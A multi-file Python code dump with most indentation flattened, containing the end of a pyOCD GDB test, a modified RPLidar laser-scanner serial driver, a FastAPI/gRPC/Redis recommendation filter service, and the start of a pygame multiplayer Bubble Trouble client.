print("Average single step time: %s" % test_result["step_time_s"])
print("Average over step time: %s" % test_result["step_time_n"])
print("Failure count: %i" % test_result["fail_count"])
result.passed = test_result["fail_count"] == 0
except IOError as err:
LOG.error("Error reading test results: %s", err, exc_info=True)
if result.passed:
print("GDB TEST PASSED")
else:
print("GDB TEST FAILED")
# Cleanup
try:
if temp_test_elf_name and os.path.exists(temp_test_elf_name):
os.remove(temp_test_elf_name)
os.remove(test_result_filename)
os.remove(test_param_filename)
except IOError as err:
pass
return result
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='pyOCD gdb test')
parser.add_argument('-d', '--debug', action="store_true", help='Enable debug logging')
args = parser.parse_args()
level = logging.DEBUG if args.debug else logging.INFO
logging.basicConfig(level=level)
ensure_output_dir()
test_gdb()
|
rplidar-save.py
|
'''Simple and lightweight module for working with RPLidar rangefinder scanners.
Usage example:
>>> from rplidar import RPLidar
>>> lidar = RPLidar('/dev/ttyUSB0')
>>>
>>> info = lidar.get_info()
>>> print(info)
>>>
>>> health = lidar.get_health()
>>> print(health)
>>>
>>> for i, scan in enumerate(lidar.iter_scans()):
... print('%d: Got %d measurements' % (i, len(scan)))
... if i > 10:
... break
...
>>> lidar.stop()
>>> lidar.stop_motor()
>>> lidar.disconnect()
For additional information please refer to the RPLidar class documentation.
'''
# import logging
import sys
import time
import codecs
import serial
import struct
from threading import Thread
SYNC_BYTE = b'\xA5'
SYNC_BYTE2 = b'\x5A'
GET_INFO_BYTE = b'\x50'
GET_HEALTH_BYTE = b'\x52'
STOP_BYTE = b'\x25'
RESET_BYTE = b'\x40'
SCAN_BYTE = b'\x20'
FORCE_SCAN_BYTE = b'\x21'
DESCRIPTOR_LEN = 7
INFO_LEN = 20
HEALTH_LEN = 3
INFO_TYPE = 4
HEALTH_TYPE = 6
SCAN_TYPE = 129
#Constants & Command to start A2 motor
MAX_MOTOR_PWM = 1023
DEFAULT_MOTOR_PWM = 660
SET_PWM_BYTE = b'\xF0'
_HEALTH_STATUSES = {
0: 'Good',
1: 'Warning',
2: 'Error',
}
PY3 = sys.version_info[0] == 3
class RPLidarException(Exception):
'''Basic exception class for RPLidar'''
def _b2i(byte):
    '''Converts byte to integer (for Python 2 compatibility)'''
return byte if PY3 else ord(byte)
def _process_scan(raw):
    '''Processes input raw data and returns measurement data'''
new_scan = bool(_b2i(raw[0]) & 0b1)
inversed_new_scan = bool((_b2i(raw[0]) >> 1) & 0b1)
quality = _b2i(raw[0]) >> 2
if new_scan == inversed_new_scan:
raise RPLidarException('New scan flags mismatch')
check_bit = _b2i(raw[1]) & 0b1
if check_bit != 1:
raise RPLidarException('Check bit not equal to 1')
angle = ((_b2i(raw[1]) >> 1) + (_b2i(raw[2]) << 7)) / 64.
distance = (_b2i(raw[3]) + (_b2i(raw[4]) << 8)) / 4.
return (new_scan, quality, angle, distance,)
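# Worked example (illustration, made-up bytes): raw = b'\x3e\x81\x37\x54\x01' decodes to
#   quality  = 0x3e >> 2                          = 15
#   angle    = ((0x81 >> 1) + (0x37 << 7)) / 64.0 = 111.0 degrees
#   distance = (0x54 + (0x01 << 8)) / 4.0         = 85.0 mm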
class RPLidar(object):
'''Class for communicating with RPLidar rangefinder scanners'''
_serial_port = None #: serial port connection
# port = '' #: Serial port name, e.g. /dev/ttyUSB0
# timeout = 1 #: Serial port timeout
# motor = False #: Is motor running?
# baudrate = 115200 #: Baudrate for serial port
# def __init__(self, port, baudrate=115200, timeout=1, logger=None):
def __init__(self, logger=None):
        '''Initialize RPLidar object for communicating with the sensor.
Parameters
----------
port : str
Serial port name to which sensor is connected
baudrate : int, optional
Baudrate for serial connection (the default is 115200)
timeout : float, optional
Serial port connection timeout in seconds (the default is 1)
logger : logging.Logger instance, optional
Logger instance, if none is provided new instance is created
'''
# self._serial_port = None
# self.port = port
# self.baudrate = baudrate
# self.timeout = timeout
self.motor_running = False
# if logger is None:
# logger = logging.getLogger(__name__)
# self.logger = logger
# self.open(port, baudrate, timeout)
# self.start_motor()
self.scan = [(0,0,)]*360
self.shutdown = False
def __del__(self):
# self.stop()
self.shutdown = True
if self._serial_port:
self.stop_motor()
self.close()
print("bye")
def start(self):
self.shutdown = False
t = Thread(target=self.update, name="rplidar", args=())
t.daemon = True
t.start()
return
def open(self, port, baudrate=115200, timeout=1):
        '''Connects to the given serial port. If the object was already
        connected to another serial port, it disconnects from it first.'''
if self._serial_port is not None:
self.close()
try:
self._serial_port = serial.Serial(
port,
baudrate,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
timeout=timeout,
dsrdtr=True)
except serial.SerialException as err:
raise RPLidarException('Failed: %s' % err)
# self.reset()
def close(self):
'''Disconnects from the serial port'''
self.stop()
self.shutdown = True
time.sleep(0.1)
        if self._serial_port and self._serial_port.is_open:
self._serial_port.close()
self._serial_port = None
def set_pwm(self, pwm):
assert(0 <= pwm <= MAX_MOTOR_PWM)
payload = struct.pack("<H", pwm)
self._send_payload_cmd(SET_PWM_BYTE, payload)
def start_motor(self):
'''Starts sensor motor'''
if self.motor_running:
return
# self.logger.info('Starting motor')
# For A1
self._serial_port.dtr = False
# For A2
self.set_pwm(DEFAULT_MOTOR_PWM)
self.motor_running = True
def stop_motor(self):
'''Stops sensor motor'''
if not self.motor_running:
return
# self.logger.info('Stoping motor')
# For A2
self.set_pwm(0)
time.sleep(.001)
# For A1
self._serial_port.dtr = True
self.motor_running = False
def _send_payload_cmd(self, cmd, payload):
'''Sends `cmd` command with `payload` to the sensor'''
size = struct.pack('B', len(payload))
req = SYNC_BYTE + cmd + size + payload
checksum = 0
for v in struct.unpack('B'*len(req), req):
checksum ^= v
req += struct.pack('B', checksum)
self._serial_port.write(req)
# self.logger.debug('Command sent: %s' % req)
def _send_cmd(self, cmd):
'''Sends `cmd` command to the sensor'''
req = SYNC_BYTE + cmd
if self._serial_port:
self._serial_port.write(req)
# self.logger.debug('Command sent: %s' % req)
def _read_descriptor(self):
'''Reads descriptor packet'''
descriptor = self._serial_port.read(DESCRIPTOR_LEN)
# self.logger.debug('Recieved descriptor: %s', descriptor)
if len(descriptor) != DESCRIPTOR_LEN:
raise RPLidarException('Descriptor length mismatch')
elif not descriptor.startswith(SYNC_BYTE + SYNC_BYTE2):
raise RPLidarException('Incorrect descriptor starting bytes')
is_single = _b2i(descriptor[-2]) == 0
return _b2i(descriptor[2]), is_single, _b2i(descriptor[-1])
def _read_response(self, dsize):
'''Reads response packet with length of `dsize` bytes'''
# self.logger.debug('Trying to read response: %d bytes', dsize)
if self._serial_port:
data = self._serial_port.read(dsize)
# self.logger.debug('Recieved data: %s', data)
if len(data) != dsize:
raise RPLidarException('Wrong body size')
return data
def info(self):
'''Get device information
Returns
-------
dict
Dictionary with the sensor information
'''
self._send_cmd(GET_INFO_BYTE)
dsize, is_single, dtype = self._read_descriptor()
if dsize != INFO_LEN:
raise RPLidarException('Wrong get_info reply length')
if not is_single:
raise RPLidarException('Not a single response mode')
if dtype != INFO_TYPE:
raise RPLidarException('Wrong response data type')
raw = self._read_response(dsize)
serialnumber = codecs.encode(raw[4:], 'hex').upper()
serialnumber = codecs.decode(serialnumber, 'ascii')
data = {
'model': _b2i(raw[0]),
'firmware': (_b2i(raw[2]), _b2i(raw[1])),
'hardware': _b2i(raw[3]),
'serialnumber': serialnumber,
}
return data
def health(self):
        '''Get device health state. When the core system detects some
        potential risk that may cause hardware failure in the future,
        the returned status value will be 'Warning', but the sensor can
        still work normally. When the sensor is in the Protection Stop
        state, the returned status value will be 'Error'. In case of a
        warning or error status, a non-zero error code is returned.
Returns
-------
status : str
'Good', 'Warning' or 'Error' statuses
error_code : int
The related error code that caused a warning/error.
'''
self._send_cmd(GET_HEALTH_BYTE)
dsize, is_single, dtype = self._read_descriptor()
if dsize != HEALTH_LEN:
            raise RPLidarException('Wrong get_health reply length')
if not is_single:
raise RPLidarException('Not a single response mode')
if dtype != HEALTH_TYPE:
raise RPLidarException('Wrong response data type')
raw = self._read_response(dsize)
status = _HEALTH_STATUSES[_b2i(raw[0])]
error_code = (_b2i(raw[1]) << 8) + _b2i(raw[2])
return status, error_code
# def clear_input(self):
# '''Clears input buffer by reading all available data'''
# self._serial_port.read_all()
def stop(self):
        '''Stops the scanning process, disables the laser diode and the
        measurement system, and moves the sensor to the idle state.'''
# self.logger.info('Stoping scanning')
self._send_cmd(STOP_BYTE)
time.sleep(.001)
self.stop_motor()
# self.clear_input()
self._serial_port.read_all()
def reset(self):
        '''Resets the sensor core, reverting it to a state similar to when
        it has just been powered up.'''
# self.logger.info('Reseting the sensor')
self._send_cmd(RESET_BYTE)
time.sleep(.002)
# def iter_measurments(self, max_buf_meas=500):
# '''Iterate over measurments. Note that consumer must be fast enough,
# otherwise data will be accumulated inside buffer and consumer will get
# data with increaing lag.
#
# Parameters
# ----------
# max_buf_meas : int
# Maximum number of measurments to be stored inside the buffer. Once
# numbe exceeds this limit buffer will be emptied out.
#
# Yields
# ------
# new_scan : bool
# True if measurment belongs to a new scan
# quality : int
# Reflected laser pulse strength
# angle : float
# The measurment heading angle in degree unit [0, 360)
# distance : float
# Measured object distance related to the sensor's rotation center.
# In millimeter unit. Set to 0 when measurment is invalid.
# '''
# self.start_motor()
# status, error_code = self.get_health()
# # self.logger.debug('Health status: %s [%d]', status, error_code)
# if status == _HEALTH_STATUSES[2]:
# # self.logger.warning('Trying to reset sensor due to the error. '
# # 'Error code: %d', error_code)
# self.reset()
# status, error_code = self.get_health()
# if status == _HEALTH_STATUSES[2]:
# raise RPLidarException('RPLidar hardware failure. '
# 'Error code: %d' % error_code)
# # elif status == _HEALTH_STATUSES[1]:
# # self.logger.warning('Warning sensor status detected! '
# # 'Error code: %d', error_code)
# cmd = SCAN_BYTE
# self._send_cmd(cmd)
# dsize, is_single, dtype = self._read_descriptor()
# if dsize != 5:
# raise RPLidarException('Wrong get_info reply length')
# if is_single:
# raise RPLidarException('Not a multiple response mode')
# if dtype != SCAN_TYPE:
# raise RPLidarException('Wrong response data type')
# while True:
# raw = self._read_response(dsize)
# # self.logger.debug('Recieved scan response: %s' % raw)
# if max_buf_meas:
# data_in_buf = self._serial_port.in_waiting
# if data_in_buf > max_buf_meas*dsize:
# # self.logger.warning(
# # 'Too many measurments in the input buffer: %d/%d. '
# # 'Clearing buffer...',
# # data_in_buf//dsize, max_buf_meas)
# self._serial_port.read(data_in_buf//dsize*dsize)
# print("oops")
# yield _process_scan(raw)
# def iter_scans(self, max_buf_meas=500, min_len=5):
# '''Iterate over scans. Note that consumer must be fast enough,
# otherwise data will be accumulated inside buffer and consumer will get
# data with increasing lag.
#
# Parameters
# ----------
# max_buf_meas : int
# Maximum number of measurments to be stored inside the buffer. Once
# numbe exceeds this limit buffer will be emptied out.
# min_len : int
# Minimum number of measurments in the scan for it to be yelded.
#
# Yields
# ------
# scan : list
# List of the measurments. Each measurment is tuple with following
# format: (quality, angle, distance). For values description please
# refer to `iter_measurments` method's documentation.
# '''
# scan = []
# iterator = self.iter_measurments(max_buf_meas)
# for new_scan, quality, angle, distance in iterator:
# if new_scan:
# if len(scan) > min_len:
# # scan = list(reversed(scan))
# yield scan
# scan = []
# if quality > 0 and distance > 0:
# scan.append((quality, angle, distance))
def get(self, max_buf_meas=500):
        '''Return the latest full scan collected by the background update()
        thread.
        Parameters
        ----------
        max_buf_meas : int
            Unused in this variant; kept for compatibility with the original
            iter_measurements() API.
        Returns
        -------
        scan : list
            List of 360 (angle, distance) tuples indexed by the integer part
            of the measurement angle. Angle is in degrees [0, 360); distance
            is in millimeters, measured from the sensor's rotation center.
            Entries still equal to (0, 0) hold no valid measurement yet.
        '''
return self.scan
# self.start_motor()
# status, error_code = self.health()
# # self.logger.debug('Health status: %s [%d]', status, error_code)
# if status == _HEALTH_STATUSES[2]:
# # self.logger.warning('Trying to reset sensor due to the error. '
# # 'Error code: %d', error_code)
# self.reset()
# status, error_code = self.health()
# if status == _HEALTH_STATUSES[2]:
# raise RPLidarException('RPLidar hardware failure. '
# 'Error code: %d' % error_code)
# # elif status == _HEALTH_STATUSES[1]:
# # self.logger.warning('Warning sensor status detected! '
# # 'Error code: %d', error_code)
# cmd = SCAN_BYTE
# self._send_cmd(cmd)
# dsize, is_single, dtype = self._read_descriptor()
# if dsize != 5:
# raise RPLidarException('Wrong get_info reply length')
# if is_single:
# raise RPLidarException('Not a multiple response mode')
# if dtype != SCAN_TYPE:
# raise RPLidarException('Wrong response data type')
#
# scan = [(0,0,)]*360
# done = False
# while not done:
# raw = self._read_response(dsize)
# # print('raw', raw)
# # self.logger.debug('Recieved scan response: %s' % raw)
# if max_buf_meas:
# data_in_buf = self._serial_port.in_waiting
# if data_in_buf > max_buf_meas*dsize:
# # self.logger.warning(
# # 'Too many measurments in the input buffer: %d/%d. '
# # 'Clearing buffer...',
# # data_in_buf//dsize, max_buf_meas)
# self._serial_port.read(data_in_buf//dsize*dsize)
# iterator = _process_scan(raw)
#
# print(iterator)
#
# # for new_scan, quality, angle, distance in iterator:
# new_scan, quality, angle, distance = iterator
# if new_scan:
# # done = True
# print(scan)
# if quality > 0 and distance > 0:
# # print('>>', angle, distance)
# # scan.append((angle, distance,))
# scan[int(angle)] = (angle, distance,)
#
# print('<<< get done >>>')
# return scan
def update(self):
# max_buf_meas=500 # ??
self.start_motor()
status, error_code = self.health()
# self.logger.debug('Health status: %s [%d]', status, error_code)
if status == _HEALTH_STATUSES[2]:
# self.logger.warning('Trying to reset sensor due to the error. '
# 'Error code: %d', error_code)
self.reset()
status, error_code = self.health()
if status == _HEALTH_STATUSES[2]:
raise RPLidarException('RPLidar hardware failure. '
'Error code: %d' % error_code)
# elif status == _HEALTH_STATUSES[1]:
# self.logger.warning('Warning sensor status detected! '
# 'Error code: %d', error_code)
cmd = SCAN_BYTE
self._send_cmd(cmd)
dsize, is_single, dtype = self._read_descriptor()
if dsize != 5:
            raise RPLidarException('Wrong scan reply length')
if is_single:
raise RPLidarException('Not a multiple response mode')
if dtype != SCAN_TYPE:
raise RPLidarException('Wrong response data type')
self.scan = [(0,0,)]*360
# done = False
while not self.shutdown:
raw = self._read_response(dsize)
if self._serial_port.in_waiting > 0:
print("still waiting", self._serial_port.in_waiting)
# print('raw', raw)
# self.logger.debug('Recieved scan response: %s' % raw)
# if max_buf_meas:
# data_in_buf = self._serial_port.in_waiting
# if data_in_buf > max_buf_meas*dsize and self._serial_port:
# # self.logger.warning(
# # 'Too many measurments in the input buffer: %d/%d. '
# # 'Clearing buffer...',
# # data_in_buf//dsize, max_buf_meas)
# self._serial_port.read(data_in_buf//dsize*dsize)
iterator = _process_scan(raw)
# print(iterator)
# for new_scan, quality, angle, distance in iterator:
new_scan, quality, angle, distance = iterator
if new_scan:
# done = True
# print(scan)
self.scan = [(0,0,)]*360
if quality > 0 and distance > 0:
# print('>>', angle, distance)
# scan.append((angle, distance,))
self.scan[int(angle)] = (angle, distance,)
# def update2(self):
# self.start_motor()
# status, error_code = self.get_health()
# # self.logger.debug('Health status: %s [%d]', status, error_code)
# if status == _HEALTH_STATUSES[2]:
# # self.logger.warning('Trying to reset sensor due to the error. '
# # 'Error code: %d', error_code)
# self.reset()
# status, error_code = self.get_health()
# if status == _HEALTH_STATUSES[2]:
# raise RPLidarException('RPLidar hardware failure. '
# 'Error code: %d' % error_code)
# # elif status == _HEALTH_STATUSES[1]:
# # self.logger.warning('Warning sensor status detected! '
# # 'Error code: %d', error_code)
# cmd = SCAN_BYTE
# self._send_cmd(cmd)
# dsize, is_single, dtype = self._read_descriptor()
# if dsize != 5:
# raise RPLidarException('Wrong get_info reply length')
# if is_single:
# raise RPLidarException('Not a multiple response mode')
# if dtype != SCAN_TYPE:
# raise RPLidarException('Wrong response data type')
# while not self.shutdown:
# raw = self._read_response(dsize)
# # self.logger.debug('Recieved scan response: %s' % raw)
# # if max_buf_meas:
# # data_in_buf = self._serial_port.in_waiting
# # if data_in_buf > max_buf_meas*dsize:
# # # self.logger.warning(
# # # 'Too many measurments in the input buffer: %d/%d. '
# # # 'Clearing buffer...',
# # # data_in_buf//dsize, max_buf_meas)
# # self._serial_port.read(data_in_buf//dsize*dsize)
# # print("oops")
# # yield _process_scan(raw)
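# A minimal usage sketch for this modified driver. Unlike the module docstring
# above, the constructor here takes no port; the device path below is an
# assumption for a typical Linux setup.
def _example_usage():
    lidar = RPLidar()
    lidar.open('/dev/ttyUSB0')   # assumed device path
    lidar.start()                # spawns the background update() thread
    time.sleep(2)                # let a few revolutions accumulate
    scan = lidar.get()           # 360-entry list of (angle, distance) tuples
    lidar.stop()
    lidar.close()
    return scan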
|
server.py
|
import uvicorn
from fastapi import FastAPI
from pydantic import BaseModel
import os
import logging
import json
from google.protobuf import any_pb2
import grpc
import time
from threading import Thread
import sys
import redis
import cache
import service_pb2
import service_pb2_grpc
import boto3
s3client = None
app = FastAPI()
# Mandatory variables in environment
MANDATORY_ENV_VARS = {
'AWS_REGION': 'ap-northeast-1',
'REDIS_HOST': 'localhost',
'REDIS_PORT': 6379,
'FILTER_PORT': 5200
}
# Notice channel
rank_notice_to_filter='rank_notice_to_filter'
sleep_interval = 10  # seconds
pickle_type = 'inverted-list'
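# Messages pushed onto the rank_notice_to_filter list are JSON objects with
# 'user_id', 'rank_result' and 'recall_result' keys; see
# poll_rank_notice_to_filter() below for how they are consumed.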
def xasync(f):
def wrapper(*args, **kwargs):
thr = Thread(target = f, args = args, kwargs = kwargs)
thr.start()
return wrapper
@app.get('/filter/status', tags=["monitoring"])
def status():
logging.info('Collecting status information from server & plugin...')
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.FilterStub(channel)
response = stub.Status(service_pb2.google_dot_protobuf_dot_empty__pb2.Empty())
statusAny = any_pb2.Any()
response.status.Unpack(statusAny)
pStatus = json.loads(statusAny.value.decode('utf-8'))
return {
'env': MANDATORY_ENV_VARS,
'redis': rCache.connection_status(),
'plugin_status': pStatus
}
@app.get('/ping', tags=["monitoring"])
def ping():
logging.info('Processing default request...')
return { 'result': 'ping' }
@app.get('/filter/get_recommend_data', tags=["filter_to_plugin"])
def get_recommend_data(userId: str, recommendType: str):
logging.info('user_id -> %s', userId)
logging.info('recommend_type -> %s', recommendType)
logging.info('start get_recommend_data')
request = any_pb2.Any()
request.value = json.dumps({
'user_id': userId,
'recommend_type': recommendType
}).encode('utf-8')
logging.info('Invoke plugin to get recommend data...')
getFilterDataRequest = service_pb2.GetFilterDataRequest(apiVersion='v1', metadata='Filter', type='RecommendResult')
getFilterDataRequest.requestBody.Pack(request)
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.FilterStub(channel)
response = stub.GetFilterData(getFilterDataRequest)
results = any_pb2.Any()
response.results.Unpack(results)
    resultJson = json.loads(results.value)  # the 'encoding' kwarg was removed from json.loads in Python 3.9
if response.code == 0:
return {
'code': response.code,
'description': response.description,
'data': resultJson['data']
}
else:
return {
'code': -1,
'description': 'failed to get recommend data',
'data': ''
}
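# A hedged example call for the endpoint above (host, port and parameter
# values are assumptions for a local run with the default FILTER_PORT):
#   curl 'http://localhost:5200/filter/get_recommend_data?userId=user-1&recommendType=recommend'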
@xasync
def poll_rank_notice_to_filter():
logging.info('poll_rank_notice_to_filter start')
while True:
try:
message_redis = rCache.lpop_data_from_list(rank_notice_to_filter)
if message_redis:
logging.info('get message {} from {}'.format(message_redis, rank_notice_to_filter))
                message = json.loads(message_redis)
user_id = message['user_id']
rank_result = message['rank_result']
recall_result = message['recall_result']
logging.info('start filter_process in poll_rank_notice_to_filter')
logging.info('user_id {}'.format(user_id))
logging.info('rank_result {}'.format(rank_result))
logging.info('recall_result {}'.format(recall_result))
reqDicts = any_pb2.Any()
reqDicts.value = json.dumps({
'user_id': user_id,
'rank_result': rank_result,
'recall_result': recall_result
}).encode('utf-8')
filterProcessRequest = service_pb2.FilterProcessRequest(apiVersion='v1', metadata='Filter', type='FilterResult')
filterProcessRequest.dicts.Pack(reqDicts)
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.FilterStub(channel)
response = stub.FilterProcess(filterProcessRequest)
results = any_pb2.Any()
response.results.Unpack(results)
if response.code==0:
logging.info("filter process succeed, user_id {}".format(user_id))
else:
logging.info("filter process failed, user_id {}, description {}".format(user_id, response.description))
else:
time.sleep( sleep_interval )
        except Exception as e:
            localtime = time.asctime( time.localtime(time.time()))
            logging.error('Filter process error: {}, time: {}'.format(e, localtime))
def read_stream_messages():
logging.info('read_stream_messages start')
read_pickle_message()
@xasync
def read_pickle_message():
logging.info('read_pickle_message start')
# Read existed stream message
stream_message = rCache.read_stream_message(pickle_type)
if stream_message:
logging.info("Handle existed stream pickle_type message")
handle_stream_message(stream_message)
while True:
logging.info('wait for reading pickle_type message')
try:
stream_message = rCache.read_stream_message_block(pickle_type)
if stream_message:
handle_stream_message(stream_message)
except redis.ConnectionError:
localtime = time.asctime( time.localtime(time.time()))
logging.info('get ConnectionError, time: {}'.format(localtime))
time.sleep( sleep_interval )
def handle_stream_message(stream_message):
logging.info('get stream message from {}'.format(stream_message))
file_type, file_path, file_list = parse_stream_message(stream_message)
logging.info('start reload data process in handle_stream_message')
logging.info('file_type {}'.format(file_type))
logging.info('file_path {}'.format(file_path))
logging.info('file_list {}'.format(file_list))
reqDicts = any_pb2.Any()
reqDicts.value = json.dumps({
'file_type': file_type,
'file_list': file_list
}).encode('utf-8')
reloadRequest = service_pb2.ReloadRequest()
reloadRequest.dicts.Pack(reqDicts)
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.FilterStub(channel)
response = stub.Reload(reloadRequest)
if response.code == 0:
logging.info('reload plugin succeeded')
else:
logging.info('reload plugin failed, description: {}'.format(response.description))
def parse_stream_message(stream_message):
for stream_name, message in stream_message:
for message_id, value in message:
decode_value = convert(value)
file_type = decode_value['file_type']
file_path = decode_value['file_path']
file_list = decode_value['file_list']
return file_type, file_path, file_list
# convert stream data to str
def convert(data):
if isinstance(data, bytes):
return data.decode('ascii')
elif isinstance(data, dict):
return dict(map(convert, data.items()))
    elif isinstance(data, tuple):
        return tuple(map(convert, data))  # keep it a tuple; a bare map object would not be subscriptable
else:
return data
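def _convert_example():
    # A minimal sketch (the sample values are assumptions, not a captured
    # stream entry): convert() turns the bytes keys/values returned by
    # redis-py into plain strings so parse_stream_message() can index them.
    sample = {b'file_type': b'inverted-list',
              b'file_path': b's3://bucket/notice/',
              b'file_list': b'["part-0.pickle"]'}
    return convert(sample)  # -> {'file_type': 'inverted-list', ...}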
def check_plugin_status():
logging.info('check plugin status')
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.FilterStub(channel)
response = stub.Status(service_pb2.google_dot_protobuf_dot_empty__pb2.Empty())
if response.code == 0:
logging.info('plugin startup succeed')
return True
else:
logging.info('plugin startup failed')
return False
def wait_for_plugin_service():
while True:
if check_plugin_status():
return
else:
logging.info('wait for plugin startup')
time.sleep( sleep_interval )
def init():
# Check out environments
for var in MANDATORY_ENV_VARS:
if var not in os.environ:
logging.error("Mandatory variable {%s} is not set, using default value {%s}.", var, MANDATORY_ENV_VARS[var])
else:
MANDATORY_ENV_VARS[var]=os.environ.get(var)
aws_region = MANDATORY_ENV_VARS['AWS_REGION']
logging.info("aws_region={}".format(aws_region))
boto3.setup_default_session(region_name=MANDATORY_ENV_VARS['AWS_REGION'])
global s3client
s3client = boto3.client('s3')
logging.info(json.dumps(s3client.list_buckets(), default=str))
# Initial redis connection
global rCache
rCache = cache.RedisCache(host=MANDATORY_ENV_VARS['REDIS_HOST'], port=MANDATORY_ENV_VARS['REDIS_PORT'])
logging.info('redis status is {}'.format(rCache.connection_status()))
wait_for_plugin_service()
logging.info('filter service start')
poll_rank_notice_to_filter()
read_stream_messages()
if __name__ == "__main__":
print('server start')
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
init()
    uvicorn.run(app, host="0.0.0.0", port=int(MANDATORY_ENV_VARS['FILTER_PORT']))
|
window.py
|
import pygame
import pygame_menu
import sys
import time
import queue
import clientNetwork as cn
from threading import Thread
pygame.init()
pygame.display.set_caption('BUBBLE TROUBLE ONLINE')
surface = pygame.display.set_mode((800, 600))
username = 'default'
clock = pygame.time.Clock()
playerId = -1
withId = -1
rivalUsername = 'empty'
port_game = 1
match = False
bgame = None
def getPlayerID():
return playerId
################################################################################
# motor.py #
################################################################################
import json
import random
import math
class BubbleGameConstants:
#####player var const values
player_stable = "stable"
player_moving_right = "right"
player_moving_left = "left"
player_image_height = 37
player_image_width = 23
#speeds
player_speed_pixels = 5
hook_speed_pixels = 15
ball_speed_pixels = 3
hit_jump_pixels = 50
#####protection
player_protection_frames = 100
player_blink_frames = 10
#####life
player_start_life = 5
#####update rate
player_update_per_frames = 5
class BubblePlayer:
#player_x
#player_y
#window_border_left
#window_border_right
player_move = BubbleGameConstants.player_stable
#gameDisplay
player_updated = False
player_shield_active = True
player_protection = BubbleGameConstants.player_protection_frames
player_shield_blink = BubbleGameConstants.player_blink_frames
player_visible = True
is_shooting = False
arrow_size = 0
#arrow_y
    arrow_x = 0  # will be overridden, does not really matter
#arrowImg
player_score = 0
player_lifes = BubbleGameConstants.player_start_life
def __init__(self, gamescreen, x, y, img, border_left, border_right, arw_img, player_id):
self.gameDisplay = gamescreen
self.player_x = x
self.player_y = y
self.player_img = img
self.window_border_left = border_left
self.window_border_right = border_right
self.arrow_y = y
self.arrowImg = arw_img
self.playerID = player_id
def activate_player_shield(self):
self.player_shield_active = True
self.player_protection = BubbleGameConstants.player_protection_frames
self.player_shield_blink = BubbleGameConstants.player_blink_frames
self.player_visible = True
def decrease_life(self):
self.player_lifes = self.player_lifes - 1
def iterate_shield_params(self):
self.player_protection = self.player_protection - 1
if self.player_protection <= 0:
self.player_shield_active = False
self.player_visible = True
else:
self.player_shield_blink = self.player_shield_blink - 1
if self.player_shield_blink <= 0:
self.player_shield_blink = BubbleGameConstants.player_blink_frames
if self.player_visible:
self.player_visible = False
else:
self.player_visible = True
    def prepare_shooting_msg(self):
if self.is_shooting:
pack = {'arr_size': self.arrow_size, 'arrx': self.arrow_x, 'arry': self.arrow_y}
return json.dumps(pack)
else:
return None
    def prepare_shield_msg(self):
if self.player_shield_active:
pack = {'prot_time': self.player_protection, 'blink_time': self.player_shield_blink, 'visible': self.player_visible}
return json.dumps(pack)
else:
return None
    def send_player_coordinates(self):
shooting_msg = self.prepare_shooting_msg()
shield_msg = self.prepare_shield_msg()
msg = cn.coordinatesPacket(self.playerID, -1, self.player_x, self.player_move, shooting_msg, shield_msg)
cn.send_udp_packet(msg, cn.udpSocket())
def player_crashed(self):
if not self.player_shield_active:
self.player_lifes = self.player_lifes - 1
self.activate_player_shield()
print("crashed, life remain: "+str(self.player_lifes))
msg = cn.deadPacket(self.playerID, self.player_lifes)
cn.send_udp_packet(msg, cn.udpSocket())
def iterate_arrow(self):
self.arrow_size += BubbleGameConstants.hook_speed_pixels
if (self.arrow_y - self.arrow_size) <= 0:
self.is_shooting = False
def draw_arrow(self, x, y, arrow_size):
self.gameDisplay.blit(pygame.transform.scale(self.arrowImg, (5, arrow_size)), (x,(y-arrow_size)))
def draw_player(self):
if self.player_shield_active:
self.iterate_shield_params()
if self.player_visible:
self.gameDisplay.blit(self.player_img,(self.player_x,self.player_y-BubbleGameConstants.player_image_height))
if self.is_shooting:
self.iterate_arrow()
self.draw_arrow(self.arrow_x, self.arrow_y, self.arrow_size)
def update_player_info(self, x, movement, shooting_msg, shield_msg):
self.player_x = x
self.player_move = movement
if shooting_msg:
self.is_shooting = True
content = json.loads(shooting_msg)
self.arrow_size = content['arr_size']
self.arrow_x = content['arrx']
self.arrow_y = content['arry']
if shield_msg:
self.player_shield_active = True
content = json.loads(shield_msg)
self.player_protection = content['prot_time']
self.player_shield_blink = content['blink_time']
self.player_visible = content['visible']
self.player_updated = True
def calculate_and_change_x(self, x, x_change):
x += x_change
if x < self.window_border_left:
x = self.window_border_left
if x > self.window_border_right:
x = self.window_border_right
return x
def move_player_auto(self):
if not self.player_updated:
if self.player_move == BubbleGameConstants.player_moving_right:
x_change = BubbleGameConstants.player_speed_pixels
elif self.player_move == BubbleGameConstants.player_moving_left:
x_change = -BubbleGameConstants.player_speed_pixels
else:
x_change = 0
self.player_x = self.calculate_and_change_x(self.player_x, x_change)
else:
            # Data was already updated during this frame; no movement needed.
            self.player_updated = False
            # If no update arrives during the next frame, the player will be moved automatically.
def shoot(self, x):
self.is_shooting = True
self.arrow_size = BubbleGameConstants.hook_speed_pixels
self.arrow_x = x
def arrow_hit(self):
self.is_shooting = False
self.player_score = self.player_score + 1
class BubbleGame:
######window
#window_height = 600
#window_width = 800
#window_border_left
#window_border_right
#window_border_up
#window_border_down
######colors
white = (255,255,255)
black = (0,0,0)
red = (255,0,0)
green = (0,255,0)
blue = (0,0,255)
bright_red = (255,155,155)
bright_green = (155,255,155)
bright_blue = (155,155,255)
########ball
ball_array = []
######
clock = pygame.time.Clock()
#####math
pi_steps = 50
    top_step = pi_steps//2  # peak point (apex of the bounce arc)
one_step_size = ((math.pi))/pi_steps
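    # The bounce trajectory is half a sine arc: each frame a ball advances one
    # step along [0, pi] (pi_steps steps in total), and its height above the
    # bottom border is ball_high * sin(step * one_step_size); top_step is the
    # apex of the arc (see move_balls below).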
#####images
ballImg_red = pygame.image.load('Images/rball6.bmp')
ballImg_orange = pygame.image.load('Images/orange_ball.gif')
ballImg_yellow = pygame.image.load('Images/yellow_ball.gif')
ballImg_green = pygame.image.load('Images/green_ball.gif')
    ball_colors = ('red', 'orange', 'yellow', 'green')  # tuple so it can be indexed by the color number from the server; the ordering is an assumption
playerImg_1 = pygame.transform.scale(pygame.image.load('Images/player.png'), (BubbleGameConstants.player_image_width, BubbleGameConstants.player_image_height))
